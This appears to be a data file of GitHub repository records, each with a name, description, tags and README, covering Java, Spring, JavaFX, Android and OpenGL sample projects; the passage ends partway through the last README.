[Dashboard]:https://www.timroes.de/2015/02/07/kibana-4-tutorial-part-4-dashboard/ [tldr;]:https://en.wiktionary.org/wiki/TLDR
1
zcmgyu/websocket-spring-react
Sample about Websocket using React and Spring Boot Oauth2 to send a notification between user.
null
## Spring Boot Websocket + React: user notifications with web socket ## This example will show how to send notifications, via web socket, to specific logged-in users (definded by access_token). Could be useful, for example, if you are trying to implement a real-time user notification system with ReactJS. [*DEMO*:](https://giphy.com/gifs/3o6fIRpgI9LnZ3jrXi/fullscreen) ![Demo](https://media.giphy.com/media/3ohs7JcKo7aeM2PHdC/giphy.gif) ### Build and run #### Configurations Backend: Open the `application.properties` file in *websocket-spring* and set your own database (in my case I'm using MongoDB). You can change User collect to Entity and repository like your project. #### Prerequisites - Java 8 - Maven > 3.0 #### From terminal 1. Start mongodb database ``` $ mongod ``` 2. Go on the project's *websocket-spring* folder, then type: ``` $ mvn spring-boot:run ``` Or, just open Maven project on IDE like IntelliJ IDEA and run `main method` in Application class 3. Go on project:s *websocket-react* folder, then type: ``` $ npm install $ npm start ``` or ``` $ yarn install $ yarn start ``` ### Usage - Launch the application and login into it with one of the following credentials (Username / Password): * user1 / user1 * user2 / user2 - Keep a window open on the index and login by user1 - Open a new private/incognito windows of your web browser and login with *user2* - From this web browser specify *target user* and click the button to send a fake action: **target user** will be notified. ### Reference Special thanks to **azanelli** for your great [example](https://github.com/netgloo/spring-boot-samples/tree/master/spring-boot-web-socket-user-notifications)
1
MoshDev/LikeYahooWeather
This is a sample shows list view with blur effect similar to Yahoo Weather App
null
LikeYahooWeather ================ This is a sample shows list view with blur effect similar to Yahoo Weather App Snapshots ================ ![Sample image1][1] ![Sample image2][2] [1]:http://i.imgur.com/9Z3BrWc.png?1 [2]:http://i.imgur.com/0PxQuIU.png?1
1
spencergibb/myfeed
Myfeed is a sample cloud natvie application build using spring-cloud
null
# myfeed Myfeed is a non-trivial sample cloud native application build using: * spring-cloud * spring-boot * spring-data # build Java 8. We use the [takari/maven-wrapper](https://github.com/takari/maven-wrapper). ``` ./mvnw clean package ``` or (on windows) ``` mvnw.bat clean package ``` ## TODO - [X] RxJava Sample - [X] Following - [X] login/logout - [X] Posting - [X] Post feed items to following users - [X] Profile view - [ ] Create UI View using stream, replace live aggregating with uiview - [ ] Security - [ ] RedisSession - [ ] Spring Restdocs - [ ] Websockets update feed: https://spring.io/guides/gs/messaging-stomp-websocket/ - [ ] Non-java service - [ ] Unfollowing - [ ] Profile edit ## Services infrastucture apps (id: default port) * myfeed-config: 11010 * myfeed-discovery: 11020 * myfeed-router: 11080 * myfeed-turbine: 11090 user apps (id: default port) * myfeed-admin: 11050 * myfeed-feed: 11060 * myfeed-user: 11070 * myfeed-ui: 11040 ## external requirements * redis * github account ## /etc/hosts entries 127.0.0.1 www.myfeed.com 127.0.0.1 discovery.myfeed.com 127.0.0.1 config.myfeed.com ## or setup dnsmasq on a mac like so (in dnsmasq.conf) address=/myfeed.com/127.0.0.1 listen-address=127.0.0.1 and add the following to `/etc/resolver/myfeed.com` nameserver 127.0.0.1
1
ghillert/spring-batch-integration-sample
Sample for the Spring Batch Integration project - see: https://github.com/SpringSource/spring-batch-admin/tree/master/spring-batch-integration
null
Spring Batch Integration Samples ================================ [![Build Status](https://travis-ci.org/ghillert/spring-batch-integration-sample.svg)](https://travis-ci.org/ghillert/spring-batch-integration-sample) This project contains samples for the [Spring Batch Integration][] module. [Spring Batch Integration]: https://github.com/spring-projects/spring-batch/tree/master/spring-batch-integration The samples are based on the sample originally created for the book [Spring Integration in Action](http://www.amazon.com/Spring-Integration-Action-Mark-Fisher/dp/1935182439/). You can find that sample at: * https://github.com/spring-projects/Spring-Integration-in-Action/tree/master/siia-examples/batch ## Objective This sample uses **Spring Batch Integration** to more easily use *Spring Batch* and *Spring Integration* together. The application will poll a directory for a file that contains 27 payment records. *Spring Batch* will subsequently process those payments. If an error occurs the Job is resubmitted. ## Provided Samples In order to illustrate the various concurrent processing techniques, we provide the following samples: * Batch Integration - Payment Import * Batch Integration - Payment Import using Concurrent Step * Batch Integration - Payment Import using Async Processor and Writer - without Spring Integration - with Spring Integration * Batch Integration - Payment Import with Remote Chunking
1
wiverson/maven-jpackage-template
Sample project illustrating building nice, small cross-platform JavaFX or Swing desktop apps with native installers while still using the standard Maven dependency system.
cross-platform-javafx java javafx javafx-application javafx-desktop-apps jpackage macos maven native-installers
# Java + Maven + GitHub Actions = Native Desktop Apps [JavaFX](https://openjfx.io) or Swing + [jpackage](https://docs.oracle.com/en/java/javase/18/docs/specs/man/jpackage.html) + [Maven](http://maven.apache.org) template project for generating native desktop applications. # Goals 1. Build nice, small cross-platform JavaFX or Swing desktop apps with native installers! 2. Just use Maven - no shell scripts required! 3. Use standard Maven dependency system to manage dependencies. 4. Generate [MacOS (.dmg), Windows (.msi) and Unix (e.g. deb/rpm)](https://github.com/wiverson/maven-jpackage-template/releases) installers/packages in the cloud with [GitHub Actions](https://github.com/wiverson/maven-jpackage-template/tree/main/.github/workflows). Out of the box, this template generates "Hello World" installers - 30-40mb .dmg, .msi and .deb files. Check out the example builds in [releases](https://github.com/wiverson/maven-jpackage-template/releases). If you are on MacOS, you notice the MacOS builds are not signed. Current versions of MacOS will report installers downloaded via browsers as damaged/unopenable. You can [clear this flag via the command-line](docs/apple-sign-notarize.md). As this is not a reasonable solution for end users, a GitHub Action is included to notarize, sign, and staple MacOS installers, but the secrets aren't set up for this repository by default. You will need an Apple Developer account to get this working. [More information on MacOS signing](docs/apple-sign-notarize.md). # Overview This template uses a [Maven plugin](https://github.com/wiverson/jtoolprovider-plugin) to generate a custom JVM and installer package for a JavaFX application. It can easily be adapted to work with Swing instead. Check out the [announcements and recent updates](https://github.com/wiverson/maven-jpackage-template/discussions/categories/announcements). ## Requirements - [Java 18](https://bell-sw.com/pages/downloads/#/java-18-current). - If you are using JavaFX, use an SDK that has JavaFX bundled: - [Liberica with JavaFX](https://bell-sw.com/pages/downloads/#/java-18-current) - [Azul Zulu with JavaFX](https://www.azul.com/downloads/?version=java-18-sts&package=jdk-fx) - If you are using Swing, pretty much any Java 17 or 18 JDK will work. - [Maven](https://maven.apache.org/). - On MacOS XCode is required. - On Windows the free [WiX Toolset](https://wixtoolset.org/) is required. ## Installation If you are on Windows, you will need to install Java, Maven, and Wix manually. If you are on MacOS or Linux, you can use [SDKMAN!](https://sdkman.io/) to simplify installing Java and Maven. Once SDKMAN! is installed, you can run the following to install Liberica or Azul Zulu and Maven. ```bash sdk install java 18.0.2.fx-librca # or sdk install java 18.0.2.fx-zulu sdk current java sdk install maven ``` ## Installation Verification 1. Verify that Java is installed by opening a fresh Terminal/Command Prompt and enter `java --version`. As of this writing, the Java version should be 18.0.2 or later. 2. Verify that Maven is installed with `mvn --version`. Maven should be version 3.8.6 or later. 3. Install platform-specific tools. 1. **MacOS only:** Verify that XCode is installed & license accepted by a) launching it and b) running `sudo xcodebuild -license`. 2. **Windows only:** Install [Wix 3 binaries](https://github.com/wixtoolset/wix3/releases/). 4. Clone/download this project. 5. Run `mvn clean install` from the root of the project to generate the `target\TestApp.dmg` or `target\TestApp.msi` installers. - The generated installer will include a version number in the file name. - For reference, here is a complete run log for [a successful run](docs/sample-run.md). Because these builds use stripped down JVM images, the [generated installers are in the 30-40mb range](https://github.com/wiverson/maven-jpackage-template/releases). On MacOS you should [add signing to avoid error messages](https://github.com/wiverson/maven-jpackage-template/issues/49) related to the security system(s). To [re]generate an installer, run... `mvn clean install` To do everything up until the actual installer generation (including generating the custom JVM)... `mvn clean package` To generate reports, include to check if you are using the current version[s] of your dependencies, run... `mvn site` ...and open target/site/index.html to see the generated reports. ## Key Features Here are few cool things in this template: - Only uses Java and Maven. No shell scripts required. - Includes sample [GitHub Actions](https://github.com/wiverson/maven-jpackage-template/tree/main/.github/workflows) to build MacOS, Windows and Linux installers. These GitHub Actions are configured to use the Liberica JDK 18 with JavaFX to simplify the build process. If you prefer to use Azul Zulu, modify the distribution name to `distribution: 'zulu'` as described on the [Usage description of setup-java](https://github.com/actions/setup-java/blob/main/docs/advanced-usage.md#Zulu) - Demonstrates setting the application icon - Builds a .dmg on MacOS, .msi on Windows, and .deb on Linux, but can be easily tweaked to generate other jpackage supported installers (e.g. .pkg) - Includes a JavaFX demo to simplify getting started. - Just delete the JavaFX stuff if you are using Swing - Template includes several examples of JavaFX / native desktop integration - Drag & drop with Finder / Explorer - Change the Dock icon dynamically on MacOS - Menu on the top for MacOS, in the window itself on Windows - Request user attention (bouncing dock icon) on MacOS - Removing the code and the demonstration dependencies gets a "Hello World" build size closer to 30mb than 40mb. - Java + Java modules are used to build a trimmed JVM ([a few thoughts on Java modules](https://changenode.com/articles/fomo-java-modules)) - The user application uses ordinary Maven dependencies and classpath to run the application - Nice illustration of how to use jlink to build a slim JVM, point jpackage at that JVM and still use the ordinary Maven managed classpath for the application Once you get started, you might find these lists of tutorials, tools, libraries for [JavaFX](https://gist.github.com/wiverson/6c7f49819016cece906f0e8cea195ea2) and general [Java desktop integration](https://gist.github.com/wiverson/e9dfd73ca9a9a222b2d0a3d68ae3f129) helpful. ### Version Numbering Usually you want a "marketing version" of an app as released to customers, and a "developer version" for use in internal testing. For example, to the end user it's just "Windows 11" but there are countless build numbers for all the different versions of Windows 11. The end-user value is set in the pom.xml as `app.version`. This value is updated to use a GitHub environment variable when the installers are run on GitHub. If you look in the `src/main/resources` you will see a version.txt file. This file has information in it that will be useful for creating a developer build UI. You might want to convert this to a properties file or a JSON file and display the information in your about UI. Most projects will want to set up a coherent versioning strategy to manage both the user visible and development build version numbers. This is usually project specific. ### Does this work with Apple Silicon aka M1/M2? Yes, although as of this writing I don't believe there are GitHub Action runners that support M1. But building locally on my M1/M2 systems works great and generates native Apple Silicon builds. ### Does this support macOS signing, notarization, and stapling? Yes, there is a GitHub Action and a Maven profile to assist with setting all of this up for macOS applications. For more information, see the [documentation on getting MacOS signing/notarization/stapling](/docs/apple-sign-notarize.md) set up. To get this working, you will need to: 1. You need to sign up for an Apple Developer account. 2. Add [four GitHub Secrets based on information from Apple]((/docs/apple-sign-notarize.md)). 3. Update the [build all installer GitHub Action yaml](https://github.com/wiverson/maven-jpackage-template/blob/6d4ef8a80a562f2d49ec41204927d07aa8990d25/.github/workflows/maven-build-all-installer.yml#L14) 4. Update the [pom.xml](https://github.com/wiverson/maven-jpackage-template/blob/6d4ef8a80a562f2d49ec41204927d07aa8990d25/pom.xml#L331). ### What about Linux? The JavaFX builds include several other architectures, including aarch64 and arm32. In theory, you should be able to add those just like the other builds. Haven't tested it though, as I only use Linux for server-side stuff. Feel free to post in the [discussion](https://github.com/wiverson/maven-jpackage-template/discussions) section and also check the [Q&A](docs/qna.md) if you are using Linux. ### Can I Use this with Swing instead of JavaFX? tl;dr absolutely. Just delete the JavaFX stuff, including the JavaFX modules declarations in `pom.xml` and add a Swing main class instead. If you are reasonably familiar with Maven this shouldn't be very hard to do. I *highly* recommend the [FlatLaf](https://www.formdev.com/flatlaf/) as a must for working with Swing in 2022. That look-and-feel plus designers such as the [IntelliJ GUI Designer](https://www.jetbrains.com/help/idea/gui-designer-basics.html) or [JFormDesigner](https://www.formdev.com/jformdesigner/) can work very well, arguably with an easier learning curve than JavaFX. Suggested changes to the pom.xml for Swing: 1. Remove the javafx modules from the jvm.modules property 2. Remove the javafx.version property. 3. Remove the three org.openjfx dependencies 4. Remove the configuration/excludeGroupIds section from the maven-dependency-plugin 5. Remove javafx-maven-plugin from the plugins list 6. Remove the modulePath delcaration from the jtoolprovider-plugin execution/configuration # Debugging 1. If the built app fails to run, make sure the JavaFX app runs as expected first by using the `mvn javafx:run` command. This will run the app in development mode locally, and you should see standard System.out debug lines appear in your console. - Many flavors of Linux fail to run here for a variety of reasons. Head over to the [discussions](https://github.com/wiverson/maven-jpackage-template/discussions) or perhaps consider your [consulting budget](https://changenode.com) or a [JavaFX support contract from Gluon](https://gluonhq.com/services/javafx-support/). 2. Check the Maven build logs (of course). 3. By default, the app will generate debug*****.log files containing the output from System.out. You can look at the main method of `BaseApplication.java` to see how this is done. For a production app, you would want to place these logs in the correct OS specific location. On a Unix machine you can `tail -f` the log normally. # Help Problems? Make sure everything is installed and working right! - Compiler not recognizing the --release option? Probably on an old JDK. - Can't find jdeps or jpackage? Probably on an old JDK. - Unrecognized option: --add-modules jdk.incubator.jpackage - Could be a left-over MAVEN_OPTS setting when you switched from Java 15 to Java 16/17 - If you are still on Java 15, you may not have [MAVEN_OPTS set correctly](https://github.com/wiverson/maven-jpackage-template/issues/2). - No certificate found matching [Developer ID Application: Company Name, Inc. (BXPXTXC35S)] using keychain [] -> Update the Developer ID info at the top of your build all installers and also in the macOS signing profile in the pom.xml. - Getting errors about not being able to find JavaFX classes in your IDE? Make sure your IDE is pointing to the right JDK. For example, MacOS IntelliJ -> select File, Project Structure and make sure you have Liberica with JavaFX selected. If you need consulting support, feel free to reach out at [ChangeNode.com](https://changenode.com/). I've helped several companies with Swing and JavaFX clean up/modernize their old apps to include updated look & feels, add MacOS sign/staple/notarization, or even in a few cases helped port the app to Spring Boot. # Q&A If you are using the template, browsing the [Q&A](docs/qna.md) is highly recommended.
1
aws-observability/aws-otel-playground
Sample Application for the AWS X-Ray SDK with support for OpenTelemetry
null
# X-Ray Instrumentation Playground This repository contains a toy application which exhibits a simple yet somewhat representative trace, including AWS SDK calls, a frontend and backend, and HTTP and gRPC. The same application is instrumented in several ways, allowing us to compare the experience when viewing traces for the different types of instrumentation. Current instrumentation includes - OpenTelemetry Auto Instrumentation + OpenTelemetry Collector - X-Ray SDK Instrumentation + X-Ray Daemon - Does not instrument many libraries like gRPC and Lettuce ## Setting up AWS resources The playground access various endpoints hosted on AWS. Feel free to skip this section to just see traces with local endpoints. To set up AWS resources you will need Terraform, available [here](https://www.terraform.io/downloads.html). First, make sure your have configured AWS credentials using the AWS CLI as described [here](https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-quickstart.html). You must also have [Java 11](https://www.oracle.com/java/technologies/javase-jdk11-downloads.html) installed to build the project. From the root of the repository, to prepare the lambda deployment, run ``` $ ./gradlew :lambda-api:build ``` Then, navigate to the `scripts/terraform` directory and run ``` $ terraform init $ terraform apply ``` This will take some time as it provisions resources. Note that this also generates `terraform.tfstate` files in the same directory. DO NOT LOSE THESE - without these files, Terraform will not be able to cleanup after you are done with the resources. After it completes, three output values will be printed. Open `docker-compose.yml` and find the four values under `#AWS Provisioned resources` Change the values so - `API_GATEWAY_ENDPOINT` is set to the output value `lambda_api_gateway_url` - `ECS_ENDPOINT` is set to the output value `ecs_url` - `EKS_ENDPOINT` is set to the output value `eks_fargate_url` - `OTEL_ENDPOINT_PEER_SERVICE_MAPPING` - replace the keys for hello-lambda-api, ecs-backend, eks-backend to the domains for these three values ## Running Make sure Docker is installed and run `$ docker-compose up` Access `http://localhost:9080/`. Then visit the X-Ray console, for example [here](https://ap-northeast-1.console.aws.amazon.com/xray/home?region=ap-northeast-1#/traces) and you should see multiple traces corresponding to the request you made. The app uses normal [AWS credentials](https://docs.aws.amazon.com/sdk-for-java/v2/developer-guide/setup-credentials.html). If you have trouble running after using the CLI to run `aws configure`, try setting the environment variables as described on that page, in particular `AWS_REGION`. Note that the `dynamodb-table` is only to create the table once, so it is normal for it to exist after creating the table. If you see excessive deadline exceeded errors or the page doesn't respond properly, your Docker configuration may not have enough RAM. We recommend setting Docker to 4GB of RAM for a smooth experience. If you make any code edits you would like to try out, first rebuild the Docker images locally. `./gradlew jibDockerBuild` and then rerun docker-compose. ## Cleaning up If you provisioned AWS resources above, run `terraform destroy` to clean them up. ## How it works The playground is composed of two observability components in addition to the business logic actually being monitored. - [OpenTelemetry Java Agent](https://github.com/open-telemetry/opentelemetry-java-instrumentation) - [OpenTelemetry Collector](https://github.com/open-telemetry/opentelemetry-collector-contrib) The recommended way to get started for your app is to run the Docker image for the collector from [here](https://hub.docker.com/r/otel/opentelemetry-collector-contrib-dev). The collector listens on port 55680 for telemetry. You will need to provide a path to a configuration file with the `--config` parameter when running. This basic configuration will work for X-Ray. ```yaml receivers: otlp: protocols: grpc: exporters: logging: loglevel: info awsxray: local_mode: true processors: memory_limiter: limit_mib: 100 check_interval: 5s service: pipelines: traces: processors: - memory_limiter receivers: - otlp exporters: - logging - awsxray # Feel free to add more exporters if you use e.g., Zipkin, Jaeger ``` If you have AWS credentials configured and both apps running on localhost, you will see traces in X-Ray if you issue any requests. If the collector cannot be accessed via localhost (e.g., in docker-compose), you may need to set the endpoint when starting your Java application using the `OTEL_OTLP_ENDPOINT` environment variable. # License This project is licensed under the MIT No Attribution License.
1
steveonjava/MaryHadALittleLambda
Sample project to demonstrate lambda features using JavaFX and the very finest retro 8-bit graphics.
null
MaryHadALittleLambda ==================== Sample project to demonstrate lambda features using JavaFX and the very finest retro 8-bit graphics.
1
adam-hurwitz/Retrorecycler
A sample of a Retrofit network call displayed with a RecyclerAdapter.
null
# Retrorecycler ## _See [The Simplest Dagger2 Dependency Injection Sample App](https://android.jlelse.eu/the-simplest-dagger2-dependency-injection-sample-80a0eb60e33b)_ **A sample of a Retrofit network call displayed with a RecyclerAdapter.** [![retrorecycler hero image](https://adam-hurwitz.firebaseapp.com/Retrorecycler/retrorecycler-hero.png)](https://android.jlelse.eu/the-simplest-dagger2-dependency-injection-sample-80a0eb60e33b) <div align="center"> <a href="https://www.flickr.com/photos/soldiersmediacenter/16327158833/in/photolist-qSLXuv-o1GVxr-o1UweQ-o9L5ZX-nU9GL4-nJvGLb-5K7CDr-jMs8Bn-nUmVGU-ee6xR3-a8711K-8VJB2N-6JHmQK-nigFUx-o9M69k-stPUhw-nK4xuD-pQNRSY-o5eK2k-nFJQMo-nDJJic-mhSRmc-nYYTBN-nULwRJ-nQqGtt-mgYaV4-pT3Am3-4N4zVZ-o7V3P1-f66vm2-kfVCoy-owjBWP-nEp8HA-nMLf7t-rPiKXz-nJx4xY-f66Wga-o71MXx-sGNNFm-nRTZZ9-or3vmE-nqxPyW-o1eDqz-nJwP9D-o322zr-oW81Yy-e5CWsE-d4kMoJ-8cGajX-91CD6C/">Photo Credit</a>: U.S. Army</div>
1
florent37/Github
Sample project using Dagger2, RxJAva, RetroLambda and Carpaccio
null
# Github <a href="https://goo.gl/WXW8Dc"> <img alt="Android app on Google Play" src="https://developer.android.com/images/brand/en_app_rgb_wo_45.png" /> </a> This Github android sample application can give you a quick summary of your github repos. ![Alt sample](https://raw.githubusercontent.com/florent37/Github/master/screens/stats_small.png) ![Alt sample](https://raw.githubusercontent.com/florent37/Github/master/screens/events_small.png) #[Dagger2](google.github.io/dagger/) ```java @Singleton @Component(modules = {GithubModule.class, ContextModule.class}) public interface GithubComponent { GithubAPI githubApi(); RepoManager repoManager(); UserManager userManager(); void inject(MainActivity mainActivity); void inject(ListRepoFragment listRepoFragment); void inject(ListEventFragment listEventFragment); } ``` #[RxAndroid](https://github.com/ReactiveX/RxAndroid) & [RetroLambda](https://github.com/evant/gradle-retrolambda) Using the github API with Retrofit ```java githubAPI.userEvents(userManager.getUser().getLogin()) .observeOn(AndroidSchedulers.mainThread()) .onErrorReturn(null) .subscribe(events -> { if (events != null) carpaccio.mapList("event", events); }); ``` #[Carpaccio](https://github.com/florent37/Carpaccio) ```xml <?xml version="1.0" encoding="utf-8"?> <LinearLayout xmlns:android="http://schemas.android.com/apk/res/android" xmlns:tools="http://schemas.android.com/tools" android:layout_width="match_parent" android:layout_height="wrap_content" android:gravity="center_vertical" android:orientation="vertical" android:paddingLeft="10dp" android:paddingRight="10dp"> <TextView android:layout_width="wrap_content" android:layout_height="wrap_content" android:padding="10dp" android:tag=" setText($event.userName); font(Roboto-Medium.ttf); " android:textColor="#333" android:textSize="18sp" tools:text="UserName" /> <LinearLayout android:layout_width="match_parent" android:layout_height="wrap_content" android:orientation="horizontal"> <TextView android:layout_width="wrap_content" android:layout_height="wrap_content" android:padding="10dp" android:tag=" setText($event.action); font(Roboto-Regular.ttf);" tools:text="Starred" /> <TextView android:layout_width="wrap_content" android:layout_height="wrap_content" android:padding="10dp" android:tag=" setText($event.repoName); " android:textColor="#5bbce4" tools:text="UserName" /> </LinearLayout> </LinearLayout> ```
1
sparsick/infra-testing-talk
Code Samples to my talk Testing and Infrastructure" / "Testen von und mit Infrastruktur""
null
# infra-testing-talk ![Build Status](https://github.com/sparsick/infra-testing-talk/workflows/MavenBuild/badge.svg) You can find here the slides and the sample code of my talk "Testen von und mit Infrastruktur". ## Simulate Infrastructure in Software Tests All code sample for simulating infrastucture in software tests are in `infra-testing-demo-app`. The code samples are tested with Java 17 and Groovy 3.0.9 embedded in a Spring Boot 2.6.3 skeleton. Following test libraries are used: - JUnit 5.8.2 including JUnit 4 (JUnit Jupiter Vintage) - AssertJ 3.21.0 - MockServer 5.11.2 - Wiremock 2.27.2 - Greenmail 1.6.5 - Testcontainers 1.14.3 - REST assured 4.3.1 - Spock 2.0 ### Tests against own REST API The test class `StarWarsMovieControllerITest` shows how to test own REST API with Spring MVC and REST Assured. Test classes `RestAssuredJsonPathTest` and `RestAssuredXmlPathTest` demonstrate REST Assured JsonPath and XmlPath feature. ### Mock REST dependencies The test classes `StarWarsClientMockserverTest`, `StarWarsClientWiremockTest` and `StarWarsClientMockserverGroovyTest` show how to mock dependencies to a REST API with MockServer or Wiremock. Test class `StarWarsClientVerifiedFakeTest` shows a sample how to implement a verify fake test. ### Testing interaction with E-Mails The test class `MailClientTest` shows how to test interaction with e-mails with Greenmail ### Testing interaction with Database The test class `PersonRepositoryJUnit4/5/SpockTest`shows how to test the repository logic including the database that is used in production with Testcontainers. Test class `DBMigrationJUnit4/5Test` shows how to test the database migration script inside my Maven build. Test class `PersonRepositoryJdbcUrlTestContainerTest`shows Testcontainers JDBCUrl feature. Test classes `*SinglwtonContainerTests` show how to implement the singlton container pattern. ## Infrastructure as Code Testing All code samples for infrastructure as code testing are in `infrastructure-as-code-testing`. The code samples are tested with Bash, Ansible 2.9.6 and Docker 19.03.12. Following test tools are used: - Shellcheck 0.7.0 - Ansible-lint 4.2.0 - yamllint 1.23.0 - Serverspec 2.41.5 - Testinfra 5.2.1 - hadolint 1.18.0 - Container Structure Test 1.9.0 - Molecule 3.0.4 - terratest 0.35.3 ### Setup Test Infrastructure I prepare some Vagrantfiles for the setup of the test infrastructure if necessary. The only prerequires are that you have to install VirtualBox and Vagrant on your machine. It is tested with Vagrant 2.2.9 . Then follow these steps: 1. Open a CLI and go to the location of the file `Vagrantfile`. 2. Call `vagrant up`. Vagrant will download the necessary image for VirtualBox. That will take some times. Hint: Public and private keys can be generated with the following command: `ssh-keygen` ### Shell Scripts Shell script sample is in `infrastructure-as-code-testing/shell`. This is also the location for the next CLI calls. - Code quality check for the shell script: `shellcheck setup-svn.sh`. ### Ansible Playbooks Ansible playbook samples are in `infrastrucutre-as-code-testing/ansible`. This is also the location for the next CLI calls. - Code quality check for Ansible playbooks with Ansible-lint: `ansible-lint *.yml` - Code quality check for YAML file in common with yamllint: `ỳamllint *yml` - Running ansible playbooks against the test infrasructure (see chapter 'Setup Test Infrastructure' above): ``` ansible-playbook -i inventories/test -u vagrant setup-db.yml # MySQL setup ansible-playbook -i inventories/test -u vagrant setup-app.yml # Apache Tomcat setup ``` - Running serverspec tests against a provisioned VM: `rake spec` - Running testinfra tests against a provisioned VM: ``` py.test --connection=ansible --ansible-inventory inventories/test -v tests/*.py ``` #### Molecule Molecule is an aggregator over some testing tools for Ansible roles. For running Molecule go to `infrasructure-as-code-testing/ansible/roles/tomcat` and run `molecule test` ### Docker Image Dockerfile sample is in `infrastrucutre-as-code-testing/docker`. This is also the location for the next CLI calls. - Code quality check for Ansible playbooks: `hadolint tomcat.df` - Build the Docker image based on `tomcat.df`: ``` docker build -t sparsick/tomcat9 -f tomcat.df . ``` - Running the Container Structure Tests (prerequisite Docker image is built before): ``` container-structure-test test --image sparsick/tomcat9:latest --config tomcat-test.yaml ``` ### Helm Charts The code samples infrastructure-as-code-testing/helm-charts are tested with Helm Chart 3.8.1 and Minikube 1.25.2 (uses Kubernetes ) #### Setup Test Infrastructure ```shell cd infrastructure-as-code-testing/helm-charts minikube start --addons=ingress helm upgrade -i spring-boot-demo-instance spring-boot-demo -f local-values.yaml ``` Call `minikube ip` to find out the IP address of your Minikube cluster and add it in your `/etc/hosts` ```shell // /etc/hosts 192.168.49.2 spring-boot-demo.local ``` Then you can see the application in your browser with http://spring-boot-demo.local/hero #### Helm Charts Linting ```shell cd infrastructure-as-code-testing/helm-charts helm lint spring-boot-demo -f local-values.yaml ``` #### Helm Charts Tests with Helm Charts The tests are located in infrastructure-as-code-testing/helm-charts/spring-boot-demo/templates/tests. If you want to run the test, you need a running minikube ```shell cd infrastructure-as-code-testing/helm-charts helm test spring-boot-demo-instance ``` #### Helm Charts Tests with Terratest The tests are located in infrastructure-as-code-testing/helm-charts/test. If you want to run the test, you need a running minikube and Golang on your machine. ```shell cd infrastructure-as-code-testing/helm-charts/test go mod tidy go test . -v ```
0
meistermeier/reactive-thymeleaf
Sample project for reactive server side rendering
java reactive thymeleaf
null
1
jvm-graphics-labs/hello-triangle
Simple sample showing a complete rendering of a triangle, in Java and Kotlin
globe java jogl kotlin opengl texture triangle
## Content: - OpenGL 4: - Hello Triangle: <img src="./screenshots/triangle-gl4.png" height="36px"> - [Simple Java](https://github.com/java-opengl-labs/helloTriangle/blob/master/src/main/java/gl4/HelloTriangleSimple.java) using pure plain JOGL, without additional libraries - [Java](https://github.com/java-opengl-labs/helloTriangle/blob/master/src/main/java/gl4/HelloTriangle.java) - [Kotlin](https://github.com/java-opengl-labs/helloTriangle/blob/master/src/main/kotlin/gl4/helloTriangle.kt) - Hello Globe: <img src="./screenshots/texture-gl4.png" height="36px"> - [Java](https://github.com/java-opengl-labs/helloTriangle/blob/master/src/main/java/gl4/HelloGlobe.java) - [Kotlin](https://github.com/java-opengl-labs/helloTriangle/blob/master/src/main/kotlin/gl4/helloGlobe.kt) - OpenGL 3: - Hello Triangle: <img src="./screenshots/triangle-gl3.png" height="36px"> - [Simple Java](https://github.com/java-opengl-labs/helloTriangle/blob/master/src/main/java/gl3/HelloTriangleSimple.java) using pure plain JOGL, without additional libraries - [Java](https://github.com/java-opengl-labs/helloTriangle/blob/master/src/main/java/gl3/HelloTriangle.java) - [Kotlin](https://github.com/java-opengl-labs/helloTriangle/blob/master/src/main/kotlin/gl3/helloTriangle.kt) - Hello Texture: <img src="./screenshots/texture-gl3.png" height="36px"> - [Java](https://github.com/java-opengl-labs/helloTriangle/blob/master/src/main/java/gl3/HelloTexture.java) - [Kotlin](https://github.com/java-opengl-labs/helloTriangle/blob/master/src/main/kotlin/gl3/helloTexture.kt) - GL injection: shows how to inject GL commands into a GL fifo from another thread (like the input listener): - [Java](https://github.com/java-opengl-labs/hello-triangle/blob/master/src/main/java/gl3/GL_injection.java) - [Kotlin](https://github.com/java-opengl-labs/hello-triangle/blob/master/src/main/kotlin/gl3/gl_injection.kt) - Input into rendering: shows how to use a fifo stack to pipe events from the EDT (listener) into the rendering loop: - [Java](https://github.com/java-opengl-labs/hello-triangle/blob/master/src/main/java/gl3/Input_into_rendering.java) - [Kotlin](https://github.com/java-opengl-labs/hello-triangle/blob/master/src/main/kotlin/gl3/input_into_rendering.kt) ## Quick start: * clone & sync Gradle * run it and enjoy the OpenGL acceleration on Java :sunglasses: (or even better, on Kotlin :scream:) If you don't know how to use Gradle, follow this simple [tutorial](https://github.com/java-opengl-labs/hello-triangle/wiki/How-to-clone-the-project-and-get-it-running) If you have any problem/question/doubt do not hesitate asking on the [jogl forums](http://forum.jogamp.org/) or [StackOverflow](http://stackoverflow.com/) or open an [issue here](https://github.com/elect86/helloTriangle/issues) In case you find the above samples too complex or difficult to understand, I strongly suggest you to start from scratch with a jogl tutorial, such as [modern-jogl-examples](https://github.com/java-opengl-labs/modern-jogl-examples). The original C tutorial it's ported from, it's one of the best, if not the best, out there.
1
SvenWoltmann/hexagonal-architecture-java
This repository contains a sample Java REST application implemented according to hexagonal architecture.
hexagonal-architecture hexagonal-architectures java ports-and-adapters
# Hexagonal Architecture in Java Tutorial [![Build](https://github.com/SvenWoltmann/hexagonal-architecture-java/actions/workflows/build.yml/badge.svg)](https://github.com/SvenWoltmann/hexagonal-architecture-java/actions/workflows/build.yml) [![Coverage](https://sonarcloud.io/api/project_badges/measure?project=SvenWoltmann_hexagonal-architecture-java&metric=coverage)](https://sonarcloud.io/dashboard?id=SvenWoltmann_hexagonal-architecture-java) [![Maintainability Rating](https://sonarcloud.io/api/project_badges/measure?project=SvenWoltmann_hexagonal-architecture-java&metric=sqale_rating)](https://sonarcloud.io/dashboard?id=SvenWoltmann_hexagonal-architecture-java) [![Reliability Rating](https://sonarcloud.io/api/project_badges/measure?project=SvenWoltmann_hexagonal-architecture-java&metric=reliability_rating)](https://sonarcloud.io/dashboard?id=SvenWoltmann_hexagonal-architecture-java) [![Security Rating](https://sonarcloud.io/api/project_badges/measure?project=SvenWoltmann_hexagonal-architecture-java&metric=security_rating)](https://sonarcloud.io/dashboard?id=SvenWoltmann_hexagonal-architecture-java) This repository contains a sample Java REST application implemented according to hexagonal architecture. It is part of the HappyCoders tutorial series on Hexagonal Architecture: * [Part 1: Hexagonal Architecture - What Is It? Why Should You Use It?](https://www.happycoders.eu/software-craftsmanship/hexagonal-architecture/). * [Part 2: Hexagonal Architecture with Java - Tutorial](https://www.happycoders.eu/software-craftsmanship/hexagonal-architecture-java/). * [Part 3: Ports and Adapters Java Tutorial: Adding a Database Adapter](https://www.happycoders.eu/software-craftsmanship/ports-and-adapters-java-tutorial-db/). * [Part 4: Hexagonal Architecture with Quarkus - 